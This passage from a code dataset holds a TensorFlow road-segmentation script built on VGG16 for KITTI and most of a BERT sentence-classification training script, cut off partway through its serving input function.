"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 8, "usage_type": "name"}, {"api_name": "booktest.models.BookInfo", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 41, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 41, "usage_type": "name"}]} {"seq_id": "257334042", "text": "import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport tests\n\n\nprint('TensorFlow Version: {}'.format(tf.__version__))\nassert (LooseVersion(tf.__version__) >= LooseVersion('1.0'),\n 'Please use TensorFlow version 1.0 or newer.')\n\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n graph = tf.get_default_graph()\n\n image_input = graph.get_tensor_by_name('image_input:0')\n keep_prob = graph.get_tensor_by_name('keep_prob:0')\n layer3 = graph.get_tensor_by_name('layer3_out:0')\n layer4 = graph.get_tensor_by_name('layer4_out:0')\n layer7 = graph.get_tensor_by_name('layer7_out:0')\n \n return image_input, keep_prob, layer3, layer4, layer7\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n layer3 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer4 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer7 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n decode1 = tf.layers.conv2d_transpose(layer7, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode2 = tf.add(decode1, layer4)\n decode3 = tf.layers.conv2d_transpose(decode2, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode4 = tf.add(decode3, layer3)\n output = tf.layers.conv2d_transpose(decode4, num_classes, 16, 8, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n return output\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n labels = tf.reshape(correct_label, (-1, num_classes))\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)\n cross_entropy_loss = tf.reduce_mean(cross_entropy)\n\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n sess.run(tf.global_variables_initializer())\n print('Training...')\n print()\n\n for epoch in range(epochs):\n print('EPOCH {} ...'.format(epoch+1))\n\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label,\n keep_prob: 0.5, learning_rate: 0.0005})\n print('Loss: {}'.format(loss))\n \n print()\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n\n tests.test_for_kitti_dataset(data_dir)\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # Needs a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n vgg_path = os.path.join(data_dir, 'vgg')\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n epochs = 50\n batch_size = 5\n\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes])\n learning_rate = tf.placeholder(tf.float32)\n\n input_image, keep_prob, layer3, layer4, layer7 = load_vgg(sess, vgg_path)\n output = layers(layer3, layer4, layer7, num_classes)\n logits, train_op, cross_entropy_loss = optimize(output, correct_label, learning_rate, num_classes)\n\n train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.__version__", "line_number": 9, "usage_type": "attribute"}, {"api_name": "distutils.version.LooseVersion", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 13, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.test.gpu_device_name", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.test", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.loader.load", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 21, "usage_type": "call"}, {"api_name": "tests.test_load_vgg", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.l2_regularizer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tests.test_layers", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tests.test_optimize", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 73, "usage_type": "call"}, {"api_name": "tests.test_train_nn", "line_number": 88, "usage_type": "call"}, {"api_name": "tests.test_for_kitti_dataset", "line_number": 97, "usage_type": "call"}, {"api_name": "helper.maybe_download_pretrained_vgg", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 105, "usage_type": "name"}, {"api_name": "helper.gen_batch_function", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 106, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 112, "usage_type": "attribute"}, {"api_name": "helper.save_inference_samples", "line_number": 121, "usage_type": "call"}]} {"seq_id": "476421959", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport csv\nimport json\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom bert import modeling\nfrom bert import optimization\nfrom bert import tokenization\n\nMIN_FLOAT = -1e30\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"bert_config_file\", None, \"The config json file corresponding to the pre-trained BERT model.\")\nflags.DEFINE_string(\"vocab_file\", None, \"The vocabulary file that the BERT model was trained on.\")\nflags.DEFINE_string(\"data_dir\", None, \"The input data dir. Should contain the .json files for the task.\")\nflags.DEFINE_string(\"task_name\", None, \"The name of the task to train.\")\nflags.DEFINE_string(\"output_dir\", None, \"The output directory where the model checkpoints will be written.\")\nflags.DEFINE_string(\"export_dir\", None, \"The export directory where the saved model will be written.\")\n\nflags.DEFINE_string(\"init_checkpoint\", None, \"Initial checkpoint (usually from a pre-trained BERT model).\")\nflags.DEFINE_bool(\"do_lower_case\", True, \"Whether to lower case the input text. True for uncased models and False for cased models.\")\n\nflags.DEFINE_integer(\"random_seed\", 100, \"Random seed for weight initialzation.\")\nflags.DEFINE_string(\"predict_tag\", None, \"Predict tag for predict result tracking.\")\n\nflags.DEFINE_integer(\n \"max_seq_length\", 128,\n \"The maximum total input sequence length after WordPiece tokenization. \"\n \"Sequences longer than this will be truncated, and sequences shorter than this will be padded.\")\n\nflags.DEFINE_bool(\"do_train\", False, \"Whether to run training.\")\nflags.DEFINE_bool(\"do_eval\", False, \"Whether to run evaluation.\")\nflags.DEFINE_bool(\"do_predict\", False, \"Whether to run prediction.\")\nflags.DEFINE_bool(\"do_export\", False, \"Whether to run exporting.\")\n\nflags.DEFINE_integer(\"train_batch_size\", 32, \"Total batch size for training.\")\nflags.DEFINE_integer(\"eval_batch_size\", 8, \"Total batch size for eval.\")\nflags.DEFINE_integer(\"predict_batch_size\", 8, \"Total batch size for predict.\")\n\nflags.DEFINE_float(\"learning_rate\", 5e-5, \"The initial learning rate for Adam.\")\nflags.DEFINE_float(\"num_train_epochs\", 3.0, \"Total number of training epochs to perform.\")\nflags.DEFINE_float(\"warmup_proportion\", 0.1, \"Proportion of training to perform linear learning rate warmup for.\")\n\nflags.DEFINE_integer(\"save_checkpoints_steps\", 1000, \"How often to save the model checkpoint.\")\nflags.DEFINE_integer(\"iterations_per_loop\", 1000, \"How many steps to make in each estimator call.\")\n\nflags.DEFINE_bool(\"use_tpu\", False, \"Whether to use TPU or GPU/CPU.\")\nflags.DEFINE_integer(\"num_tpu_cores\", 8,\"Only used if `use_tpu` is True. Total number of TPU cores to use.\")\nflags.DEFINE_string(\"master\", None, \"[Optional] TensorFlow master URL.\")\n\nflags.DEFINE_string(\n \"tpu_name\", None,\n \"The Cloud TPU to use for training. This should be either the name \"\n \"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.\")\n\nflags.DEFINE_string(\n \"tpu_zone\", None,\n \"[Optional] GCE zone where the Cloud TPU is located in. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nflags.DEFINE_string(\n \"gcp_project\", None,\n \"[Optional] Project name for the Cloud TPU-enabled project. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n def __init__(self,\n guid,\n text,\n sent_label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n sent_label: (Optional) string. The sentence label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text = text\n self.sent_label = sent_label\n\nclass PaddingInputExample(object):\n \"\"\"Fake example so the num input examples is a multiple of the batch size.\n \n When running eval/predict on the TPU, we need to pad the number of examples\n to be a multiple of the batch size, because the TPU requires a fixed batch\n size. The alternative is to drop the last batch, which is bad because it means\n the entire output data won't be generated.\n \n We use this class instead of `None` because treating `None` as padding\n battches could cause silent errors.\n \"\"\"\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n def __init__(self,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_id):\n self.input_ids = input_ids\n self.input_masks = input_masks\n self.segment_ids = segment_ids\n self.sent_label_id = sent_label_id\n\nclass ClassificationProcessor(object):\n \"\"\"Processor for the classification data set.\"\"\"\n def __init__(self,\n data_dir,\n task_name):\n self.data_dir = data_dir\n self.task_name = task_name\n \n def get_train_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n data_path = os.path.join(self.data_dir, \"train-{0}\".format(self.task_name), \"train-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_dev_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n data_path = os.path.join(self.data_dir, \"dev-{0}\".format(self.task_name), \"dev-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_test_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the test set.\"\"\"\n data_path = os.path.join(self.data_dir, \"test-{0}\".format(self.task_name), \"test-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_sent_labels(self):\n \"\"\"Gets the list of sentence labels for this data set.\"\"\"\n data_path = os.path.join(self.data_dir, \"resource\", \"sent_label.vocab\")\n sent_labels = self._read_text(data_path)\n return sent_labels\n \n def _read_text(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"rb\") as file:\n data_list = []\n for line in file:\n data_list.append(line.decode(\"utf-8\").strip())\n\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _read_json(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"r\") as file:\n data_list = json.load(file)\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _get_example(self,\n data_list):\n example_list = []\n for data in data_list:\n guid = data[\"id\"]\n text = tokenization.convert_to_unicode(data[\"text\"])\n sent_label = tokenization.convert_to_unicode(data[\"sent_label\"])\n example = InputExample(guid=guid, text=text, sent_label=sent_label)\n example_list.append(example)\n \n return example_list\n\ndef convert_single_example(ex_index,\n example,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Converts a single `InputExample` into a single `InputFeatures`.\"\"\"\n if isinstance(example, PaddingInputExample):\n return InputFeatures(\n input_ids=[0] * max_seq_length,\n input_masks=[0] * max_seq_length,\n segment_ids=[0] * max_seq_length,\n sent_label_id=0)\n \n sent_label_map = {}\n for (i, sent_label) in enumerate(sent_label_list):\n sent_label_map[sent_label] = i\n \n tokens = tokenizer.tokenize(example.text)\n \n if len(tokens) > max_seq_length - 2:\n tokens = tokens[0:(max_seq_length - 2)]\n \n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n \n input_tokens = []\n segment_ids = []\n sent_label_id = sent_label_map[example.sent_label]\n \n input_tokens.append(\"[CLS]\")\n segment_ids.append(0)\n \n for token in tokens:\n input_tokens.append(token)\n segment_ids.append(0)\n \n input_tokens.append(\"[SEP]\")\n segment_ids.append(0)\n \n input_ids = tokenizer.convert_tokens_to_ids(input_tokens)\n \n # The mask has 1 for real tokens and 0 for padding tokens. Only real tokens are attended to.\n input_masks = [1] * len(input_ids)\n \n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_masks.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_masks) == max_seq_length\n assert len(segment_ids) == max_seq_length\n \n if ex_index < 5:\n tf.logging.info(\"*** Example ***\")\n tf.logging.info(\"guid: %s\" % (example.guid))\n tf.logging.info(\"tokens: %s\" % \" \".join([tokenization.printable_text(x) for x in tokens]))\n tf.logging.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n tf.logging.info(\"input_masks: %s\" % \" \".join([str(x) for x in input_masks]))\n tf.logging.info(\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n tf.logging.info(\"sent_label_id: %s\" % str(sent_label_id))\n\n feature = InputFeatures(\n input_ids=input_ids,\n input_masks=input_masks,\n segment_ids=segment_ids,\n sent_label_id=sent_label_id)\n return feature\n\ndef convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Convert a set of `InputExample`s to a list of `InputFeatures`.\"\"\"\n features = []\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n features.append(feature)\n \n return features\n\ndef input_fn_builder(features,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n all_input_ids = []\n all_input_masks = []\n all_segment_ids = []\n all_sent_label_ids = []\n \n for feature in features:\n all_input_ids.append(feature.input_ids)\n all_input_masks.append(feature.input_masks)\n all_segment_ids.append(feature.segment_ids)\n all_sent_label_ids.append(feature.sent_label_id)\n \n def input_fn(params):\n batch_size = params[\"batch_size\"]\n num_examples = len(features)\n\n # This is for demo purposes and does NOT scale to large data sets. We do\n # not use Dataset.from_generator() because that uses tf.py_func which is\n # not TPU compatible. The right way to load data is with TFRecordReader.\n d = tf.data.Dataset.from_tensor_slices({\n \"input_ids\": tf.constant(all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"input_masks\": tf.constant(all_input_masks, shape=[num_examples, seq_length], dtype=tf.int32),\n \"segment_ids\": tf.constant(all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"sent_label_ids\": tf.constant(all_sent_label_ids, shape=[num_examples], dtype=tf.int32),\n })\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder)\n return d\n \n return input_fn\n\ndef file_based_convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer,\n output_file):\n \"\"\"Convert a set of `InputExample`s to a TFRecord file.\"\"\"\n def create_int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n \n writer = tf.python_io.TFRecordWriter(output_file)\n \n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n \n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_masks\"] = create_int_feature(feature.input_masks)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"sent_label_ids\"] = create_int_feature([feature.sent_label_id])\n \n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n \n writer.write(tf_example.SerializeToString())\n \n writer.close()\n\ndef file_based_input_fn_builder(input_file,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n name_to_features = {\n \"input_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"input_masks\": tf.FixedLenFeature([seq_length], tf.int64),\n \"segment_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"sent_label_ids\": tf.FixedLenFeature([], tf.int64),\n }\n \n def _decode_record(record,\n name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n example = tf.parse_single_example(record, name_to_features)\n \n # tf.Example only supports tf.int64, but the TPU only supports tf.int32. So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n \n return example\n \n def input_fn(params):\n \"\"\"The actual input function.\"\"\"\n batch_size = params[\"batch_size\"]\n \n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n d = tf.data.TFRecordDataset(input_file)\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.apply(tf.contrib.data.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n batch_size=batch_size,\n drop_remainder=drop_remainder))\n \n return d\n \n return input_fn\n\ndef create_model(bert_config,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_ids,\n sent_label_list,\n mode,\n use_tpu):\n \"\"\"Creates a Classifier model.\"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_masks,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_tpu)\n \n # If you want to use sentence-level output, use model.get_pooled_output()\n # If you want to use token-level output, use model.get_sequence_output()\n with tf.variable_scope(\"sent\", reuse=tf.AUTO_REUSE):\n sent_result = model.get_pooled_output()\n sent_result_mask = tf.cast(tf.reduce_max(input_masks, axis=-1, keepdims=True), dtype=tf.float32)\n \n sent_kernel_initializer = tf.glorot_uniform_initializer(seed=np.random.randint(10000), dtype=tf.float32)\n sent_bias_initializer = tf.zeros_initializer\n sent_dense_layer = tf.keras.layers.Dense(units=len(sent_label_list), activation=None, use_bias=True,\n kernel_initializer=sent_kernel_initializer, bias_initializer=sent_bias_initializer,\n kernel_regularizer=None, bias_regularizer=None, trainable=True)\n \n sent_dropout_layer = tf.keras.layers.Dropout(rate=0.1, seed=np.random.randint(10000))\n \n sent_result = sent_dense_layer(sent_result)\n if mode == tf.estimator.ModeKeys.TRAIN:\n sent_result = sent_dropout_layer(sent_result)\n \n masked_sent_predict = sent_result * sent_result_mask + MIN_FLOAT * (1 - sent_result_mask)\n sent_predict_probs = tf.nn.softmax(masked_sent_predict, axis=-1)\n sent_predict_ids = tf.cast(tf.argmax(sent_predict_probs, axis=-1), dtype=tf.int32)\n sent_predict_scores = tf.reduce_max(sent_predict_probs, axis=-1)\n \n loss = tf.constant(0.0, dtype=tf.float32)\n if mode not in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL]:\n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n \n if sent_label_ids is not None:\n with tf.variable_scope(\"sent_loss\", reuse=tf.AUTO_REUSE):\n sent_label = tf.cast(sent_label_ids, dtype=tf.float32)\n sent_label_mask = tf.cast(tf.reduce_max(input_masks, axis=-1), dtype=tf.float32)\n masked_sent_label = tf.cast(sent_label * sent_label_mask, dtype=tf.int32)\n sent_cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=masked_sent_label, logits=masked_sent_predict)\n sent_loss = tf.reduce_sum(sent_cross_entropy * sent_label_mask) / tf.reduce_sum(tf.reduce_max(sent_label_mask, axis=-1))\n loss = loss + sent_loss\n \n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n\ndef model_fn_builder(bert_config,\n sent_label_list,\n init_checkpoint,\n learning_rate,\n num_train_steps,\n num_warmup_steps,\n use_tpu):\n \"\"\"Returns `model_fn` closure for TPUEstimator.\"\"\"\n def model_fn(features,\n labels,\n mode,\n params): # pylint: disable=unused-argument\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n \n input_ids = features[\"input_ids\"]\n input_masks = features[\"input_masks\"]\n segment_ids = features[\"segment_ids\"]\n sent_label_ids = features[\"sent_label_ids\"] if mode in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL] else None\n \n loss, sent_predict_ids, sent_predict_scores, sent_predict_probs = create_model(bert_config,\n input_ids, input_masks, segment_ids, sent_label_ids, sent_label_list, mode, use_tpu)\n \n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n scaffold_fn = None\n \n if init_checkpoint:\n assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n \n if use_tpu:\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n \n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n \n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n \n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape, init_string)\n \n output_spec = None \n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n elif mode == tf.estimator.ModeKeys.EVAL:\n def metric_fn(sent_label_ids,\n sent_predict_ids):\n sent_accuracy = tf.metrics.accuracy(labels=sent_label_ids, predictions=sent_predict_ids)\n \n metric = {\n \"sent_accuracy\": sent_accuracy,\n }\n \n return metric\n \n eval_metrics = (metric_fn, [sent_label_ids, sent_predict_ids])\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n eval_metrics=eval_metrics,\n scaffold_fn=scaffold_fn)\n else:\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions={\n \"sent_predict_id\": sent_predict_ids,\n \"sent_predict_score\": sent_predict_scores,\n \"sent_predict_prob\": sent_predict_probs\n },\n scaffold_fn=scaffold_fn)\n \n return output_spec\n \n return model_fn\n\ndef get_masked_data(data_ids,\n label_list):\n label_map = {}\n for (i, label) in enumerate(label_list):\n label_map[label] = i\n\n pad_id = tf.constant(label_map[\"[PAD]\"], shape=[], dtype=tf.int32)\n out_id = tf.constant(label_map[\"O\"], shape=[], dtype=tf.int32)\n x_id = tf.constant(label_map[\"X\"], shape=[], dtype=tf.int32)\n cls_id = tf.constant(label_map[\"[CLS]\"], shape=[], dtype=tf.int32)\n sep_id = tf.constant(label_map[\"[SEP]\"], shape=[], dtype=tf.int32)\n\n masked_data_ids = (tf.cast(tf.not_equal(data_ids, pad_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, out_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, x_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, cls_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, sep_id), dtype=tf.int32))\n \n return masked_data_ids\n\ndef serving_input_fn():\n with tf.variable_scope(\"export\"):\n features = {\n 'input_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_ids'),\n 'input_masks': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_masks'),\n 'segment_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='segment_ids')\n }\n \n return 